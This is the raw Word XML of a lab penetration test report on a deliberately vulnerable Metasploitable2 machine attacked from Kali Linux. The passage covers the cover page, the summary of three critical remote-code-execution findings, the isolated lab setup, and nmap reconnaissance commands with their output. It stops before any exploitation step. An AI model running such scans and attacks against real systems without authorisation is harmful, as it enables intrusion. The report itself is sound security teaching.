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79BD" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:spacing w:before="1800"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A542266" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
        </w:rPr>
        <w:t>VULNERABILITY ASSESSMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B87B9F" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F3460"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
        </w:rPr>
        <w:t>&amp; EXPLOITATION REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686B510F" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7811A588" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="0F3460"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="580840A0" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FA41B75" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Simulated Enterprise Network Penetration Test</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9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6"/>
        <w:gridCol w:w="4886"/>
      </w:tblGrid>
      <w:tr w:rsidR="00905B53" w14:paraId="27BFF752" w14:textId="77777777" w:rsidTr="001B378F">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="517"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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E2F78" w14:textId="77777777" w:rsidR="00905B53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Classification</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C2FF1E0" w14:textId="77777777" w:rsidR="00905B53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EDUCATIONAL / LAB USE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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EEBB3" w14:textId="77777777" w:rsidR="00905B53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Date</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62851D3F" w14:textId="56FD7B22" w:rsidR="00905B53" w:rsidRDefault="001B378F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December</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>, 202</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="0199B4C3" w14:textId="77777777" w:rsidTr="001B378F">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="517"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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FBAD1" w14:textId="77777777" w:rsidR="00905B53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Attacker Platform</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="612E95FA" w14:textId="77777777" w:rsidR="00905B53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Kali Linux + Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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C7E8C" w14:textId="77777777" w:rsidR="00905B53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Target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52CF9BD2" w14:textId="77777777" w:rsidR="00905B53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Metasploitable2 / DVWA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00B85EC8" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:spacing w:before="300"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C18CC24" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>⚠  This report was produced in a controlled lab environment for academic purposes only  ⚠</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5C49DF" w14:textId="77777777" w:rsidR="00905B5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7973"/>
      </w:tblGrid>
      <w:tr w:rsidR="00905B53" w14:paraId="53148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B180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01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4C84BE6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Executive Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5661AAF5" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE864BF" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>This report presents the findings of a structured penetration test performed in a controlled virtual lab environment. The engagement simulates a real-world black-box assessment of an enterprise network, targeting an intentionally vulnerable machine (Metasploitable2) from a Kali Linux attacker system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6DFB3C" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The assessment followed a six-phase methodology: environment setup, reconnaissance, vulnerability identification, exploitation, post-exploitation, and reporting. All activities were confined to an isolated Host-Only network with no interaction with external systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4BEC6A" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53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05B53" w14:paraId="71DC0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95A27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4541F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05B53" w14:paraId="0FF747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0ADBA0" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000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9854BB" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerability Assessment &amp; Exploitation in a Simulated Enterprise Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="288EA3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910495" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Assessment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699BE7" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Black-Box Penetration Test (Simulated)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="7E4AA5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194F75" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Target System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09DC05" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metasploitable Linux 2.0.0 (Ubuntu 8.04 LTS — Kernel 2.6.24-16-server)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="4AF66A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BEEF9E" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker System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FB3394" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kali Linux 2025.4 with Metasploit Framework 6.4.99-dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="07C56B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63002F" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Network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0AFE29" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VirtualBox 7.1.8 Host-Only — 192.168.56.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="189544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A6FD4" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr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90F860" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>All services on victim machine — single subnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="2D821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841D50" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical Findings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654E85" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3 Critical RCE vulnerabilities (vsftpd, Samba, UnrealIRCd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="474A5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C36D9C" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Overall Risk Rating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50E411" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CRITICAL — Immediate remediation required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0AF8BFA5" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53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8141"/>
      </w:tblGrid>
      <w:tr w:rsidR="00905B53" w14:paraId="2A220B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CD1D8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96B0816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Lab Environment Setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="772BD98A" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68457F10" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Virtualization Platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D28736F" w14:textId="77BFA485" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The lab was built on VirtualBox 7.1.8 using a Host-Only network adapter to ensure full isolation between virtual machines. No internet-facing adapters were assigned to the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E1555F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Hypervisor: VirtualBox 7.1.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1694F482" w14:textId="6D1969D9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Network Mode: Host-Only Adapter —(192.168.56.0/24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B74CE47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Promiscuous Mode: Allow VMs (enabled on Kali adapter for traffic capture)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1A7CB0" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Attacker Machine — Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422E78BA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OS: Kali Linux 2025.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDA5D1A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Adapter 1: NAT (internet access for tool updates)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533266A4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Adapter 2: Host-Only — 192.168.56.104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F988442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Tools: Metasploit Framework, Nmap, Searchsploit, Netcat, Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2916BA49" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.3 Victim Machine — Metasploitable Linux 2.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F541FB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OS: Metasploitable Linux 2.0.0 — Ubuntu 8.04 LTS (Kernel 2.6.24-16-server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F1349E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Adapter 1: Host-Only only — 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7C6399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Note: No NAT adapter assigned to prevent internet exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7505A205" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.4 Network Topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742597EB" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53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200"/>
        <w:gridCol w:w="2160"/>
      </w:tblGrid>
      <w:tr w:rsidR="00905B53" w14:paraId="146B0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2072F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Machine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A76CF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CA9C8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Adapter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A3B8C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</w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="29D52B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FE38AF" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VirtualBox Host (PC)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D17407" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Hypervisor / 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5D244E" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Host-Only gateway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46B686" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.56.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="7F23A8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0565BE" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metasploitable Linux 2.0.0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1D2C3F" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Victim / Primary Target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376166" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Host-Only only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A07134" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.56.103</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="637DFF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F63529" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kali Linux 2025.4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6235D8" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker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B8720A" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NAT + Host-Only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FBC9EA" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.56.104</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73BFEE79" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="252C8667" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Network verification command run from Kali Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382CED5E" w14:textId="66431AF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nmap -sn 192.168.56.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9B01B9" w14:textId="77777777" w:rsidR="00905B5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7765"/>
      </w:tblGrid>
      <w:tr w:rsidR="00905B53" w14:paraId="62D6AC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DD021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03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0464520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Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60B2D574" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47B3B94D" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D8A9F8" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The reconnaissance phase aimed to map the target network, enumerate all open ports, identify running services and their version numbers, and detect the operating system of the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FD779F" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 Host Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E2D127" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>A ping sweep was used to identify live hosts on the lab subnet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7E7618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nmap -sn 192.168.56.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A856802" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Result: 3 live hosts discovered on the subnet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF40724" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EC2D80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Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-10 04:55 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E575CF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Nmap scan report for 192.168.56.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E538B4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Host is up (0.00058s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BD1534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MAC Address: 08:00:27:9D:89:B3 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E32E2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Nmap scan report for 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6D7158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Host is up (0.0064s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A21023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MAC Address: 08:00:27:62:FC:BB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F52006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Nmap scan report for 192.168.56.104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E57823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Host is up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093E839A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Nmap done: 256 IP addresses (3 hosts up) scanned in 15.69 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4B56DB" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53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1193"/>
        <w:gridCol w:w="2368"/>
        <w:gridCol w:w="2892"/>
        <w:gridCol w:w="1236"/>
      </w:tblGrid>
      <w:tr w:rsidR="00905B53" w14:paraId="7B199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FD3F7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3A4B6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Latency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2CF3C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MAC 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4E0AD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Identified As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C294F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In Scope?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="068B68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5F5750" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.56.1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A55416" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0.00058s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97700F" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>08:00:27:9D:89:B3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B2E5C3" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VirtualBox 7.1.8 Gateway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253C69" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No — Hypervisor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="7C7DBA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320719" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.56.103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471A54" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0.0064s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C9F6F7" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>08:00:27:62:FC:BB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140B51" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metasploitable Linux 2.0.0 — Target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02F500" w14:textId="77777777" w:rsidR="00905B53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905B53" w14:paraId="3CAA0F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78B2DE" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.56.104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72E542" w14:textId="77777777" w:rsidR="00905B53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D20380" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(local machine)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DCF5FA" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kali Linux 2025.4 — Attacker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D565AA" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No — Attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6322E05F" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 Full Port &amp; Service Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C06820A" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>A comprehensive SYN scan with version detection, default scripts, and OS fingerprinting was performed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B79832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nmap -sV -sC -O -p- 192.168.56.103 -oN scan_results.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E56727C" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:spacing w:before="80" w:after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1092"/>
        <w:gridCol w:w="1591"/>
        <w:gridCol w:w="3140"/>
        <w:gridCol w:w="1547"/>
      </w:tblGrid>
      <w:tr w:rsidR="00905B53" w14:paraId="15DD2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2BAFE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C61BD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E63BA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4CF22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Detected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08CA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905B53" w14:paraId="441F57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DA28C9" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000"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5B80B6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6589DA" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
